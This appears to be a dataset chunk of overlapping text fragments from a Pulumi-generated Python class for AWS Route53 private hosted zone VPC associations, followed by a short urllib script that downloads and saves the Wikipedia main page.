"> **NOTE:** Terraform provides both this standalone Zone VPC Association resource and exclusive",
"know what you are doing! *** import json import warnings import pulumi import",
"You can optionally use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes`",
"import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to associate with",
"you cannot use those in-line VPC associations in conjunction with this resource and",
"opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions",
"= vpc_region if zone_id is None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] =",
"to associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\"",
"configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both",
"Options for the resource. :param pulumi.Input[str] vpc_id: The VPC to associate with the",
"a ResourceOptions instance') __props__ = dict() if vpc_id is None: raise TypeError(\"Missing required",
"__name__ if __opts__ is not None: warnings.warn(\"explicit use of __opts__ is deprecated, use",
"DeprecationWarning) opts = __opts__ if not resource_name: raise TypeError('Missing resource name argument (for",
"the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by",
"region. Defaults to the region of the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\"",
"import pulumi import pulumi.runtime from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str]",
"[`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both this standalone Zone VPC Association",
"this resource. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts:",
"region of the AWS provider. :param pulumi.Input[str] zone_id: The private hosted zone to",
"required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def",
"is not recommended. Use the `vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html)",
"private hosted zone. :param pulumi.Input[str] vpc_region: The VPC's region. Defaults to the region",
"are doing! *** import json import warnings import pulumi import pulumi.runtime from ..",
"hand unless you're certain you know what you are doing! *** import json",
"by hand unless you're certain you know what you are doing! *** import",
"dict() if vpc_id is None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id",
"use 'opts' instead\", DeprecationWarning) opts = __opts__ if not resource_name: raise TypeError('Missing resource",
"class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to associate with the private hosted",
"Hosted Zone VPC association. VPC associations can only be made on private zones.",
"= dict() if vpc_id is None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] =",
"VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At",
"it will cause a perpetual difference in plan output. You can optionally use",
"vpc_id __props__['vpc_region'] = vpc_region if zone_id is None: raise TypeError(\"Missing required property 'zone_id'\")",
"__opts__ if not resource_name: raise TypeError('Missing resource name argument (for URN creation)') if",
"Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're",
"region of the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted zone",
"the `aws_route53_zone` resource to manage additional associations via this resource. :param str resource_name:",
"resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to manage additional",
"the same zone ID otherwise it will cause a perpetual difference in plan",
"The VPC to associate with the private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\"",
"provides both this standalone Zone VPC Association resource and exclusive VPC associations defined",
"Defaults to the region of the AWS provider. :param pulumi.Input[str] zone_id: The private",
"`ignore_changes` in the `aws_route53_zone` resource to manage additional associations via this resource. :param",
"VPC Association resource and exclusive VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html)",
"pulumi.runtime from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC",
"available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both this standalone",
"# *** Do not edit by hand unless you're certain you know what",
"coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge",
"The VPC's region. Defaults to the region of the AWS provider. :param pulumi.Input[str]",
"`vpc` configuration blocks. At this time, you cannot use those in-line VPC associations",
"*** Do not edit by hand unless you're certain you know what you",
"if vpc_id is None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region']",
"__props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if zone_id is None: raise TypeError(\"Missing required",
"associations in conjunction with this resource and the same zone ID otherwise it",
"\"\"\" The VPC's region. Defaults to the region of the AWS provider. \"\"\"",
"vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted Zone VPC association.",
"resource_name = __name__ if __opts__ is not None: warnings.warn(\"explicit use of __opts__ is",
"association ordering is required (e.g. a separate cross-account association authorization), usage of this",
"\"\"\" if __name__ is not None: warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning)",
"is deprecated, use 'opts' instead\", DeprecationWarning) opts = __opts__ if not resource_name: raise",
"<reponame>Charliekenney23/pulumi-aws # coding=utf-8 # *** WARNING: this file was generated by the Pulumi",
"resource name argument (for URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource",
"opts = __opts__ if not resource_name: raise TypeError('Missing resource name argument (for URN",
":param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for",
"resource_name, __props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop):",
"Tool. *** # *** Do not edit by hand unless you're certain you",
"DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn(\"explicit use of __opts__",
"warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning) resource_name = __name__ if __opts__ is",
"ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to associate with the private hosted zone.",
"cross-account association authorization), usage of this resource is not recommended. Use the `vpc`",
"be a ResourceOptions instance') __props__ = dict() if vpc_id is None: raise TypeError(\"Missing",
"edit by hand unless you're certain you know what you are doing! ***",
"resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource.",
"zone ID otherwise it will cause a perpetual difference in plan output. You",
"None: warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning) opts =",
"zone_id: pulumi.Output[str] \"\"\" The private hosted zone to associate. \"\"\" def __init__(__self__, resource_name,",
"resource to manage additional associations via this resource. :param str resource_name: The name",
"provider. :param pulumi.Input[str] zone_id: The private hosted zone to associate. \"\"\" if __name__",
"is not None: warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning) resource_name = __name__",
"required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if zone_id is None:",
"block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to manage additional associations via this",
"in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time, you cannot",
"required (e.g. a separate cross-account association authorization), usage of this resource is not",
"VPC associations can only be made on private zones. > **NOTE:** Unless explicit",
"with this resource and the same zone ID otherwise it will cause a",
"VPC to associate with the private hosted zone. :param pulumi.Input[str] vpc_region: The VPC's",
"raise TypeError('Expected resource name to be a string') if opts and not isinstance(opts,",
"instead. > **NOTE:** Terraform provides both this standalone Zone VPC Association resource and",
"Use the `vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:**",
"only be made on private zones. > **NOTE:** Unless explicit association ordering is",
"instance') __props__ = dict() if vpc_id is None: raise TypeError(\"Missing required property 'vpc_id'\")",
"`aws_route53_zone` resource to manage additional associations via this resource. :param str resource_name: The",
"name to be a string') if opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected",
"Unless explicit association ordering is required (e.g. a separate cross-account association authorization), usage",
"to the region of the AWS provider. :param pulumi.Input[str] zone_id: The private hosted",
"opts: Options for the resource. :param pulumi.Input[str] vpc_id: The VPC to associate with",
"associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this",
"recommended. Use the `vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. >",
"defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time,",
"__opts__=None): \"\"\" Manages a Route53 Hosted Zone VPC association. VPC associations can only",
"blocks. At this time, you cannot use those in-line VPC associations in conjunction",
"the private hosted zone. :param pulumi.Input[str] vpc_region: The VPC's region. Defaults to the",
"in plan output. You can optionally use the generic Terraform resource [lifecycle configuration",
"via this resource. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions",
"Manages a Route53 Hosted Zone VPC association. VPC associations can only be made",
"private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults to the",
"with the private hosted zone. :param pulumi.Input[str] vpc_region: The VPC's region. Defaults to",
"not None: warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning) opts",
"association. VPC associations can only be made on private zones. > **NOTE:** Unless",
"> **NOTE:** Unless explicit association ordering is required (e.g. a separate cross-account association",
"vpc_region: The VPC's region. Defaults to the region of the AWS provider. :param",
"associations can only be made on private zones. > **NOTE:** Unless explicit association",
"resource options to be a ResourceOptions instance') __props__ = dict() if vpc_id is",
"utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to associate with the",
"not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') __props__",
"resource is not recommended. Use the `vpc` configuration blocks available within the [`aws_route53_zone`",
"pulumi.Input[str] vpc_region: The VPC's region. Defaults to the region of the AWS provider.",
"use of __name__ is deprecated\", DeprecationWarning) resource_name = __name__ if __opts__ is not",
"of the AWS provider. :param pulumi.Input[str] zone_id: The private hosted zone to associate.",
"if not isinstance(resource_name, str): raise TypeError('Expected resource name to be a string') if",
"a perpetual difference in plan output. You can optionally use the generic Terraform",
"\"\"\" The VPC to associate with the private hosted zone. \"\"\" vpc_region: pulumi.Output[str]",
"*** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool.",
"provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted zone to associate. \"\"\" def",
"will cause a perpetual difference in plan output. You can optionally use the",
"Zone VPC association. VPC associations can only be made on private zones. >",
"a string') if opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to",
"on private zones. > **NOTE:** Unless explicit association ordering is required (e.g. a",
":param pulumi.Input[str] vpc_id: The VPC to associate with the private hosted zone. :param",
"by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit",
"AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted zone to associate. \"\"\"",
"name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str]",
"if __opts__ is not None: warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts'",
"warnings import pulumi import pulumi.runtime from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id:",
"in the `aws_route53_zone` resource to manage additional associations via this resource. :param str",
"translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop",
"import warnings import pulumi import pulumi.runtime from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource):",
"TypeError('Expected resource name to be a string') if opts and not isinstance(opts, pulumi.ResourceOptions):",
"Terraform provides both this standalone Zone VPC Association resource and exclusive VPC associations",
"TypeError('Expected resource options to be a ResourceOptions instance') __props__ = dict() if vpc_id",
"doing! *** import json import warnings import pulumi import pulumi.runtime from .. import",
"of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] vpc_id:",
"Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand",
":param pulumi.Input[str] zone_id: The private hosted zone to associate. \"\"\" if __name__ is",
"'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if zone_id is None: raise TypeError(\"Missing",
"same zone ID otherwise it will cause a perpetual difference in plan output.",
"\"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults to the region of the",
"(for URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource name to be",
"use those in-line VPC associations in conjunction with this resource and the same",
"ResourceOptions instance') __props__ = dict() if vpc_id is None: raise TypeError(\"Missing required property",
"those in-line VPC associations in conjunction with this resource and the same zone",
"in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time, you",
"if opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a",
"deprecated, use 'opts' instead\", DeprecationWarning) opts = __opts__ if not resource_name: raise TypeError('Missing",
"via `vpc` configuration blocks. At this time, you cannot use those in-line VPC",
"# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform",
"VPC's region. Defaults to the region of the AWS provider. \"\"\" zone_id: pulumi.Output[str]",
"raise TypeError('Missing resource name argument (for URN creation)') if not isinstance(resource_name, str): raise",
"URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource name to be a",
"the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both this standalone Zone VPC",
"generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to",
"zone to associate. \"\"\" if __name__ is not None: warnings.warn(\"explicit use of __name__",
"associate. \"\"\" if __name__ is not None: warnings.warn(\"explicit use of __name__ is deprecated\",",
"associate with the private hosted zone. :param pulumi.Input[str] vpc_region: The VPC's region. Defaults",
"str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the",
"is deprecated\", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn(\"explicit use",
"Route53 Hosted Zone VPC association. VPC associations can only be made on private",
"creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource name to be a string')",
"the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] vpc_id: The",
"within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both this standalone Zone",
"VPC to associate with the private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The",
"a separate cross-account association authorization), usage of this resource is not recommended. Use",
"the region of the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted",
"zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or",
"opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop)",
".. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to associate",
"this time, you cannot use those in-line VPC associations in conjunction with this",
"raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__,",
"output. You can optionally use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with",
"resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] vpc_id: The VPC",
"__props__ = dict() if vpc_id is None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id']",
"resource and the same zone ID otherwise it will cause a perpetual difference",
"exclusive VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks.",
"TypeError('Missing resource name argument (for URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected",
"raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if zone_id",
"to associate. \"\"\" if __name__ is not None: warnings.warn(\"explicit use of __name__ is",
"additional associations via this resource. :param str resource_name: The name of the resource.",
"Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to manage",
"association authorization), usage of this resource is not recommended. Use the `vpc` configuration",
"and the same zone ID otherwise it will cause a perpetual difference in",
"tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to associate with the private",
":param pulumi.Input[str] vpc_region: The VPC's region. Defaults to the region of the AWS",
"hosted zone. :param pulumi.Input[str] vpc_region: The VPC's region. Defaults to the region of",
"resource and exclusive VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc`",
"made on private zones. > **NOTE:** Unless explicit association ordering is required (e.g.",
"VPC associations in conjunction with this resource and the same zone ID otherwise",
"conjunction with this resource and the same zone ID otherwise it will cause",
"= zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop)",
"both this standalone Zone VPC Association resource and exclusive VPC associations defined in-line",
"resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both this standalone Zone VPC Association resource",
"be a string') if opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options",
"None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name,",
"zone_id: The private hosted zone to associate. \"\"\" if __name__ is not None:",
"associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages",
"otherwise it will cause a perpetual difference in plan output. You can optionally",
"__props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop): return",
"Do not edit by hand unless you're certain you know what you are",
"plan output. You can optionally use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle)",
"TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if zone_id is",
"instead\", DeprecationWarning) opts = __opts__ if not resource_name: raise TypeError('Missing resource name argument",
"generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not",
"WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***",
"VPC's region. Defaults to the region of the AWS provider. :param pulumi.Input[str] zone_id:",
"Defaults to the region of the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The",
"import pulumi.runtime from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The",
"is None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation',",
"The VPC to associate with the private hosted zone. :param pulumi.Input[str] vpc_region: The",
"for the resource. :param pulumi.Input[str] vpc_id: The VPC to associate with the private",
"The private hosted zone to associate. \"\"\" if __name__ is not None: warnings.warn(\"explicit",
"the AWS provider. :param pulumi.Input[str] zone_id: The private hosted zone to associate. \"\"\"",
"warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning) opts = __opts__",
"if zone_id is None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation,",
"with the private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults",
"the region of the AWS provider. :param pulumi.Input[str] zone_id: The private hosted zone",
"The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param",
"not None: warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning) resource_name = __name__ if",
"zone. :param pulumi.Input[str] vpc_region: The VPC's region. Defaults to the region of the",
"associations via this resource. :param str resource_name: The name of the resource. :param",
"and exclusive VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration",
"is required (e.g. a separate cross-account association authorization), usage of this resource is",
"unless you're certain you know what you are doing! *** import json import",
"*** import json import warnings import pulumi import pulumi.runtime from .. import utilities,",
"blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both this",
"ordering is required (e.g. a separate cross-account association authorization), usage of this resource",
"(e.g. a separate cross-account association authorization), usage of this resource is not recommended.",
"TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts)",
"private hosted zone to associate. \"\"\" if __name__ is not None: warnings.warn(\"explicit use",
"private hosted zone to associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None,",
"import json import warnings import pulumi import pulumi.runtime from .. import utilities, tables",
"configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to manage additional associations via",
"the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time, you cannot use",
"__name__ is deprecated\", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn(\"explicit",
"perpetual difference in plan output. You can optionally use the generic Terraform resource",
"pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] vpc_id: The VPC to associate",
"vpc_id is None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] =",
"private zones. > **NOTE:** Unless explicit association ordering is required (e.g. a separate",
"not recommended. Use the `vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead.",
"this standalone Zone VPC Association resource and exclusive VPC associations defined in-line in",
"hosted zone to associate. \"\"\" if __name__ is not None: warnings.warn(\"explicit use of",
"hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults to the region",
"__props__['vpc_region'] = vpc_region if zone_id is None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id']",
"cause a perpetual difference in plan output. You can optionally use the generic",
"json import warnings import pulumi import pulumi.runtime from .. import utilities, tables class",
"this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** #",
"resource. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options",
"= __name__ if __opts__ is not None: warnings.warn(\"explicit use of __opts__ is deprecated,",
"VPC association. VPC associations can only be made on private zones. > **NOTE:**",
"Zone VPC Association resource and exclusive VPC associations defined in-line in the [`aws_route53_zone`",
"'opts' instead\", DeprecationWarning) opts = __opts__ if not resource_name: raise TypeError('Missing resource name",
"configuration blocks. At this time, you cannot use those in-line VPC associations in",
"AWS provider. :param pulumi.Input[str] zone_id: The private hosted zone to associate. \"\"\" if",
"isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') __props__ =",
"resource name to be a string') if opts and not isinstance(opts, pulumi.ResourceOptions): raise",
"None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if",
"the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted zone to associate.",
"to be a string') if opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource",
"The private hosted zone to associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None,",
"**NOTE:** Unless explicit association ordering is required (e.g. a separate cross-account association authorization),",
"super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop",
"is None: raise TypeError(\"Missing required property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region",
"def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53",
"__self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def",
"time, you cannot use those in-line VPC associations in conjunction with this resource",
"separate cross-account association authorization), usage of this resource is not recommended. Use the",
"use of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning) opts = __opts__ if",
"of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning) opts = __opts__ if not",
"options to be a ResourceOptions instance') __props__ = dict() if vpc_id is None:",
"opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted Zone VPC",
"file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # ***",
"you know what you are doing! *** import json import warnings import pulumi",
"not resource_name: raise TypeError('Missing resource name argument (for URN creation)') if not isinstance(resource_name,",
"can optionally use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in",
"\"\"\" Manages a Route53 Hosted Zone VPC association. VPC associations can only be",
"`vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides",
"if __name__ is not None: warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning) resource_name",
"isinstance(resource_name, str): raise TypeError('Expected resource name to be a string') if opts and",
"was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do",
"the `vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform",
"with `ignore_changes` in the `aws_route53_zone` resource to manage additional associations via this resource.",
"zones. > **NOTE:** Unless explicit association ordering is required (e.g. a separate cross-account",
"'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self,",
"zone to associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None):",
"to associate with the private hosted zone. :param pulumi.Input[str] vpc_region: The VPC's region.",
"The VPC's region. Defaults to the region of the AWS provider. \"\"\" zone_id:",
":param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] vpc_id: The VPC to",
"what you are doing! *** import json import warnings import pulumi import pulumi.runtime",
"__opts__ is not None: warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts' instead\","
] |
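The row above holds overlapping fragments of a Pulumi-generated `aws.route53.ZoneAssociation` class and its docstrings. As a minimal usage sketch (assuming a recent `pulumi_aws` package; the `primary`/`secondary` VPCs and the zone name are hypothetical), the documented pattern of pairing an inline `vpcs` block plus `ignore_changes` with a standalone association might look like this:

import pulumi
import pulumi_aws as aws

# Hypothetical VPCs; names and CIDR blocks are illustrative only.
primary = aws.ec2.Vpc("primary", cidr_block="10.0.0.0/16")
secondary = aws.ec2.Vpc("secondary", cidr_block="10.1.0.0/16")

# A private zone needs at least one VPC at creation time. Ignoring changes
# to "vpcs" lets additional associations be managed by ZoneAssociation,
# avoiding the perpetual plan diff the docstring warns about.
zone = aws.route53.Zone(
    "private",
    name="internal.example.com",
    vpcs=[aws.route53.ZoneVpcArgs(vpc_id=primary.id)],
    opts=pulumi.ResourceOptions(ignore_changes=["vpcs"]),
)

# Standalone association of a second VPC with the private hosted zone;
# vpc_region is optional and defaults to the region of the AWS provider.
extra = aws.route53.ZoneAssociation(
    "extra",
    zone_id=zone.zone_id,
    vpc_id=secondary.id,
)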
[
"<gh_stars>0 # downoad web page import urllib.request as request url = \"https://en.wikipedia.org/wiki/Main_Page\" data",
"with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File saved with name (current directory): data.html\\n\")",
"Save html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File saved with name",
"print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\") as fl: fl.write(data.decode(\"utf8\")) print(\"\\n\\nFinishh\") print(\"File saved",
"= \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with open(\"data.html\",\"w\") as",
"request url = \"https://en.wikipedia.org/wiki/Main_Page\" data = request.urlopen(url).read() print(data.decode(\"utf8\")) # Save html file with",
